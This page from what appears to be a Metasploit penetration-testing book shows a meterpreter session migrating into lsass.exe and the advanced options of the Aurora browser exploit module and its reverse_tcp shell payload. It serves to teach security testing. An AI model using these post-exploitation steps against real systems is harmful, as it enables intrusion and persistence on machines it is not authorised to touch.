118
Chapter 8
meterpreter >
run migrate
[*] Current server process: IEXPLORE.EXE (2120)
[*] Migrating to lsass.exe...
[*] Migrating into process ID 680
[*] New server process: lsass.exe (680)
meterpreter >
This is a pretty manual process. You can automate this whole process
using some advanced options to migrate to a process automatically upon a
successful shell. Type
show advanced
to list the advanced features of the Aurora
module:
msf exploit(ms10_002_aurora) >
show advanced
Module advanced options:
Name : ContextInformationFile
Current Setting:
Description : The information file that contains context information
Name : DisablePayloadHandler
Current Setting: false
Description : Disable the handler code for the selected payload
Name : EnableContextEncoding
Current Setting: false
Description : Use transient context when encoding payloads
Name : WORKSPACE
Current Setting:
Description : Specify the workspace for this module
Payload advanced options (windows/meterpreter/reverse_tcp):
Name : AutoLoadStdapi
Current Setting: true
Description : Automatically load the Stdapi extension
Name : AutoRunScript
Current Setting:
Description : A script to run automatically on session creation.
Name : AutoSystemInfo
Current Setting: true
Description : Automatically capture system information on initialization.
Name : InitialAutoRunScript
Current Setting:
Description : An initial script to run on session created (before AutoRunScript)
Name : ReverseConnectRetries
Current Setting: 5
Description : The number of connection attempts to try before exiting the process